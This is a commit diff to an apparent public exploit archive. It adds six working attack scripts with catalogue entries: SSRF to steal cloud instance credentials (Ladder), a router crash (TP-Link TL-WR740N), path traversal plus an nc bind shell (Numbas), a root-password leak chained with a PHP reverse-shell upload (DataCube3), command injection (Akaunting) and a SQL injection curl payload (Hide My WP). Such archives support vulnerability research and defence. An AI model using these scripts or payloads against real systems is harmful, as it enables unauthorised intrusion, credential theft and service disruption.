DB: 2024-03-11

7 changes to exploits/shellcodes/ghdb Ladder v0.0.21 - Server-side request forgery (SSRF) TP-Link TL-WR740N - Buffer Overflow 'DOS' Numbas < v7.3 - Remote Code Execution Akaunting < 3.1.3 - RCE DataCube3 v1.0 - Unrestricted file upload 'RCE' Hide My WP < 6.2.9 - Unauthenticated SQLi
2024-03-11 00:16:24 +00:00 · 2024-03-11 00:16:24 +00:00 · 60a90afc8d
commit 60a90afc8d
parent 0af7c5d561
7 changed files with 537 additions and 0 deletions
--- a/exploits/go/webapps/51869.txt
+++ b/exploits/go/webapps/51869.txt
@ -0,0 +1,18 @@
+# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
+# Date: 2024-01-20
+# Exploit Author: @_chebuya
+# Software Link: https://github.com/everywall/ladder
+# Version: v0.0.1 - v0.0.21
+# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
+# CVE: CVE-2024-27620
+# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context.  An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs
+
+import requests
+import json
+
+target_url = "http://127.0.0.1:8080/api/"
+imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
+
+r = requests.get(target_url + imdsv1_url)
+response_json = json.loads(r.text)
+print(response_json["body"])
--- a/exploits/hardware/webapps/51866.txt
+++ b/exploits/hardware/webapps/51866.txt
@ -0,0 +1,58 @@
+# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
+# Date: 8/12/2023
+# Exploit Author: Anish Feroz (ZEROXINN)
+# Vendor Homepage: http://www.tp-link.com
+# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
+# Tested on: TP-Link TL-WR740N
+
+#Description:
+
+#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
+
+#Usage:
+
+#python3 target username password
+#change port, if required
+
+------------------------------------------------POC-----------------------------------------
+
+#!/usr/bin/python
+
+import requests
+from requests.auth import HTTPBasicAuth
+import base64
+
+def send_request(ip, username, password):
+    auth_url = f"http://{ip}:8082"
+    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
+
+    credentials = f"{username}:{password}"
+    encoded_credentials = base64.b64encode(credentials.encode()).decode()
+
+    headers = {
+        "Host": f"{ip}:8082",
+        "Authorization": f"Basic {encoded_credentials}",
+        "Upgrade-Insecure-Requests": "1",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
+        "Accept-Encoding": "gzip, deflate",
+        "Accept-Language": "en-US,en;q=0.9",
+        "Connection": "close"
+    }
+
+    session = requests.Session()
+
+    response = session.get(target_url, headers=headers)
+
+    if response.status_code == 200:
+        print("Server Crashed")
+        print(response.text)
+    else:
+        print(f"Script Completed with status code {response.status_code}")
+
+ip_address = input("Enter IP address of the host: ")
+username = input("Enter username: ")
+password = input("Enter password: ")
+
+send_request(ip_address, username, password)
--- a/exploits/nodejs/webapps/51867.txt
+++ b/exploits/nodejs/webapps/51867.txt
@ -0,0 +1,167 @@
+# Exploit Title: Numbas < v7.3 - Remote Code Execution
+# Google Dork: N/A
+# Date: March 7th, 2024
+# Exploit Author: Matheus Boschetti
+# Vendor Homepage: https://www.numbas.org.uk/
+# Software Link: https://github.com/numbas/Numbas
+# Version: 7.2 and below
+# Tested on: Linux
+# CVE: CVE-2024-27612
+
+import sys, requests, re, argparse, subprocess, time
+from bs4 import BeautifulSoup
+
+s = requests.session()
+
+def getCSRF(target):
+    url = f"http://{target}/"
+    req = s.get(url)
+    soup = BeautifulSoup(req.text, 'html.parser')
+    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
+    return csrfmiddlewaretoken
+
+def createTheme(target):
+    # Format request
+    csrfmiddlewaretoken = getCSRF(target)
+    theme = 'ExampleTheme'
+    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
+    data = (
+        f'--{boundary}\r\n'
+        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
+        '\r\n'
+        f'{csrfmiddlewaretoken}\r\n'
+        f'--{boundary}\r\n'
+        'Content-Disposition: form-data; name="name"\r\n'
+        '\r\n'
+        f'{theme}\r\n'
+        f'--{boundary}--\r\n'
+    )
+    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
+               'User-Agent': 'Mozilla/5.0',
+               'Accept': '*/*',
+               'Connection': 'close'}
+
+    # Create theme and return its ID
+    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
+    redir = req.url
+    split = redir.split('/')
+    id = split[4]
+    print(f"\t[i] Theme created with ID {id}")
+    return id
+
+def login(target, user, passwd):
+    print("\n[i] Attempting to login...")
+
+    csrfmiddlewaretoken = getCSRF(target)
+    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
+            'username': user,
+            'password': passwd,
+            'next': '/'}
+
+    # Login
+    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
+    res = login.text
+    if("Logged in as" not in res):
+        print("\n\n[!] Login failed!")
+        sys.exit(-1)
+
+    # Check if logged and fetch ID
+    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
+    if usermatch:
+        user = usermatch.group(1)
+        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
+        if idmatch:
+            id = idmatch.group(1)
+            print(f"\t[+] Logged in as \"{user}\" with ID {id}")
+
+def checkVuln(url):
+    print("[i] Checking if target is vulnerable...")
+
+    # Attempt to read files
+    themeID = createTheme(url)
+    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
+    hname = s.get(f"{target}/etc/hostname")
+    ver = s.get(f"{target}/etc/issue")
+    hnamesoup = BeautifulSoup(hname.text, 'html.parser')
+    versoup = BeautifulSoup(ver.text, 'html.parser')
+    hostname = hnamesoup.find('textarea').get_text().strip()
+    version = versoup.find('textarea').get_text().strip()
+    if len(hostname) < 1:
+        print("\n\n[!] Something went wrong - target might not be vulnerable.")
+        sys.exit(-1)
+    print(f"\n[+] Target \"{hostname}\" is vulnerable!")
+    print(f"\t[i] Running: \"{version}\"")
+
+    # Cleanup - delete theme
+    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
+    target = f"http://{url}/themes/{themeID}/delete"
+    csrfmiddlewaretoken = getCSRF(url)
+    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
+    s.post(target, data=data)
+
+
+def replaceInit(target):
+    # Overwrite __init__.py with arbitrary code
+    rport = '8443'
+    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
+    csrfmiddlewaretoken = getCSRF(target)
+    filename = '../../../../numbas_editor/numbas/__init__.py'
+    themeID = createTheme(target)
+    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
+            'source': payload,
+            'filename': filename}
+
+    print("[i] Delivering payload...")
+    # Retry 5 times in case something goes wrong...
+    for attempt in range(5):
+        try:
+            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
+        except Exception as e:
+            pass
+
+    # Establish connection to bind shell
+    time.sleep(2)
+    print(f"\t[+] Payload delivered, establishing connection...\n")
+    if ":" in target:
+        split = target.split(":")
+        ip = split[0]
+    else:
+        ip = str(target)
+    subprocess.Popen(["nc", "-n", ip, rport])
+    while True:
+        pass
+
+
+def main():
+    parser = argparse.ArgumentParser()
+    if len(sys.argv) <= 1:
+        print("\n[!] No option provided!")
+        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
+        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
+        sys.exit(-1)
+
+    group = parser.add_mutually_exclusive_group(required=True)
+    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
+    parser.add_argument('--target', help='Target IP:PORT')
+    parser.add_argument('--user', help='Username to authenticate')
+    parser.add_argument('--passwd', help='Password to authenticate')
+    args = parser.parse_args()
+    action = args.action
+    target = args.target
+    user = args.user
+    passwd = args.passwd
+
+    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")
+
+    if action == 'check':
+        login(target, user, passwd)
+        checkVuln(target)
+    elif action == 'exploit':
+        login(target, user, passwd)
+        replaceInit(target)
+    else:
+        sys.exit(-1)
+
+
+if __name__ == "__main__":
+    main()
--- a/exploits/php/webapps/51868.txt
+++ b/exploits/php/webapps/51868.txt
@ -0,0 +1,145 @@
+# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
+# Date: 7/28/2022
+# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
+# Vendor Homepage: https://www.f-logic.jp
+# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
+# Version: Ver1.0
+# Tested on: DataCube3 version 1.0 (Ubuntu)
+# CVE : CVE-2024-25830 + CVE-2024-25832
+
+# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload
+
+from __future__ import print_function, unicode_literals
+from bs4 import BeautifulSoup
+import argparse
+import requests
+import json
+import urllib3
+import re
+urllib3.disable_warnings()
+
+def banner():
+  dataCube3Logo = """
+        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
+      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓
+      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
+      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
+      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
+      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓
+      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓
+      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓
+        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓
+
+\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
+                FOR EDUCATIONAL PURPOSE ONLY.
+  """
+  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))
+
+
+def extractRootPwd(RHOST, RPORT, protocol):
+  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
+  try:
+    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+      exit()
+    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
+    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
+    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
+    adminPassword = jsonLeakedData[12]['value']
+    rootPassword = jsonLeakedData[14]['value']
+    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
+    return rootPassword
+  except:
+    print('[ERROR] Can\'t grab the DataCube3 version...')
+
+
+def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
+  print('[INFO] Generating DataCube3 auth cookie ...')
+  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
+  data = {
+    'user_id': 'root',
+    'user_pw': rootPassword,
+    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
+  }
+  try:
+    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
+      exit()
+    authCookie = response.cookies.get_dict()
+    print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
+    return authCookie
+  except:
+    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')
+
+
+def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
+  print('[INFO] Extracting Accesstime ...')
+  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
+  try:
+    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
+      exit()
+    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
+    print('[INFO] AccessTime value: {}'.format(accessTime))
+    return accessTime
+  except:
+    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')
+
+
+def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
+  print('[INFO] Injecting PHP reverse shell script ...')
+  filename='rvs.php'
+  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)
+
+  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå<6E><C3A5>ç<EFBFBD><C3A7>è¿½å<C2BD>\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)
+
+  headers = {
+      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
+  }
+  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
+  try:
+    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
+        exit()
+    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
+    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
+    return shellURL
+  except:
+    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')
+
+
+def execReverseShell(shellURL):
+  print('[INFO] Executing reverse shell...')
+  try:
+    response = requests.get(shellURL, allow_redirects=False, verify=False)
+    print('[INFO] Reverse shell successfully executed.')
+    return
+  except Exception as e:
+      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
+      return False
+
+
+def main():
+  banner()
+  args = parser.parse_args()
+  protocol = 'https' if args.RPORT == 443 else 'http'
+  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
+  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
+  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
+  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
+  execReverseShell(shellURL)
+
+
+if __name__ == '__main__':
+  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
+  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
+  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
+  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
+  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
+  main()
--- a/exploits/php/webapps/51870.txt
+++ b/exploits/php/webapps/51870.txt
@ -0,0 +1,122 @@
+# Exploit Title: Akaunting < 3.1.3 - RCE
+# Date: 08/02/2024
+# Exploit Author: u32i@proton.me
+# Vendor Homepage: https://akaunting.com
+# Software Link: https://github.com/akaunting/akaunting
+# Version: <= 3.1.3
+# Tested on: Ubuntu (22.04)
+# CVE : CVE-2024-22836
+
+#!/usr/bin/python3
+
+import sys
+import re
+import requests
+import argparse
+
+def get_company():
+	# print("[INF] Retrieving company id...")
+	res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
+	if res.status_code != 302:
+		print("[ERR] No company id was found!")
+		sys.exit(3)
+	cid = res.headers['Location'].split('/')[-1]
+	if cid == "login":
+		print("[ERR] Invalid session cookie!")
+		sys.exit(7)
+	return cid
+
+def get_tokens(url):
+	res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
+	search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)
+
+	if not search_res:
+		print("[ERR] Couldn't get csrf token")
+		sys.exit(1)
+
+	data = {}
+	data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')
+	data['session'] = res.cookies.get('akaunting_session')
+	return data
+
+def inject_command(cmd):
+	url = f"{target}/{company_id}/wizard/companies"
+	tokens = get_tokens(url)
+	headers.update({"X-Csrf-Token": tokens['csrf_token']})
+	data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
+	res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
+	if res.status_code == 200:
+		res_data = res.json()
+		if res_data['error']:
+			print("[ERR] Command injection failed!")
+			sys.exit(4)
+		print("[INF] Command injected!")
+
+
+def trigger_rce(app, version = "1.0.0"):
+	print("[INF] Executing the command...")
+	url = f"{target}/{company_id}/apps/install"
+	data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
+	headers.update({"Content-Type":"application/json"})
+	res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
+	if res.status_code == 200:
+		res_data = res.json()
+		if res_data['error']:
+			search_res = re.search(r">Exit Code\:.*<", res_data['message'])
+			if search_res:
+				print("[ERR] Failed to execute the command")
+				sys.exit(6)
+			print("[ERR] Failed to install the app! no command was executed!")
+			sys.exit(5)
+		print("[INF] Executed successfully!")
+
+def login(email, password):
+	url = f"{target}/auth/login"
+	tokens = get_tokens(url)
+
+	cookies.update({
+		'akaunting_session': tokens['session']
+	})
+
+	data = {
+		"_token": tokens['csrf_token'],
+		"_method": "POST",
+		"email": email,
+		"password": password
+	}
+
+	req = requests.post(url, headers=headers, cookies=cookies, data=data)
+	res = req.json()
+	if res['error']:
+		print("[ERR] Failed to log in!")
+		sys.exit(8)
+
+	print("[INF] Logged in")
+	cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})
+
+def main():
+	inject_command(args.command)
+	trigger_rce(args.alias, args.version)
+
+if __name__=='__main__':
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-u", "--url", help="target url")
+	parser.add_argument("--email", help="user login email.")
+	parser.add_argument("--password", help="user login password.")
+	parser.add_argument("-i", "--id", type=int, help="company id (optional).")
+	parser.add_argument("-c", "--command", help="command to execute.")
+	parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
+	parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
+
+	args = parser.parse_args()
+
+	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
+	cookies = {}
+	target = args.url
+
+	try:
+		login(args.email, args.password)
+		company_id = get_company() if not args.id else args.id
+		main()
+	except:
+		sys.exit(0)
--- a/exploits/php/webapps/51871.txt
+++ b/exploits/php/webapps/51871.txt
@ -0,0 +1,21 @@
+# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
+# Publication Date: 2023-01-11
+# Original Researcher: Xenofon Vassilakopoulos
+# Exploit Author: Xenofon Vassilakopoulos
+# Submitter: Xenofon Vassilakopoulos
+# Vendor Homepage: https://wpwave.com/
+# Version: Hide My WP v6.2.8 and prior
+# Tested on: Hide My WP v6.2.7
+# Impact: Database Access
+# CVE: CVE-2022-4681
+# CWE: CWE-89
+# CVSS Score: 8.6 (high)
+
+## Description
+
+The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
+
+
+## Proof of Concept
+
+curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
+51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
 51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
@ -4919,6 +4920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
 51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
+51866,exploits/hardware/webapps/51866.txt,"TP-Link TL-WR740N - Buffer Overflow 'DOS'",2024-03-10,"Anish Feroz",webapps,hardware,,2024-03-10,2024-03-10,0,,,,,,
 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
 51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
 51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@ -12383,6 +12385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,,
 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,,2021-02-10,2021-02-10,0,CVE-2017-5941,,,,,
 50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,,2021-06-18,2021-06-18,0,CVE-2017-5941,,,,,
+51867,exploits/nodejs/webapps/51867.txt,"Numbas < v7.3 - Remote Code Execution",2024-03-10,"Matheus Alexandre",webapps,nodejs,,2024-03-10,2024-03-10,0,CVE-2024-27612,,,,,
 50716,exploits/nodejs/webapps/50716.rb,"Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",2022-02-08,WackyH4cker,webapps,nodejs,,2022-02-08,2022-02-08,0,CVE-2019-18818,,,,,
 13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",dos,novell,139,2010-06-16,,1,CVE-2010-2351;OSVDB-65625,,,,,
 19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",dos,novell,,2000-02-04,2012-07-11,1,CVE-2000-0152;OSVDB-7468,,,,,https://www.securityfocus.com/bid/976/info
@ -13799,6 +13802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,,
 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,,
 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,,
+51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,,
 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz,
 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,,
 10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,webapps,php,,2010-01-01,,1,,,,,,
@ -16719,6 +16723,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
 45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
 15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,webapps,php,,2010-10-14,2010-10-14,1,,,,,http://www.exploit-db.comUploadManagemnt23205.zip,
+51868,exploits/php/webapps/51868.txt,"DataCube3 v1.0 - Unrestricted file upload 'RCE'",2024-03-10,"Samy Younsi - NS Labs",webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-25832;CVE-2024-25830,,,,,
 17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php,,2011-06-07,2011-06-07,1,,,,,,
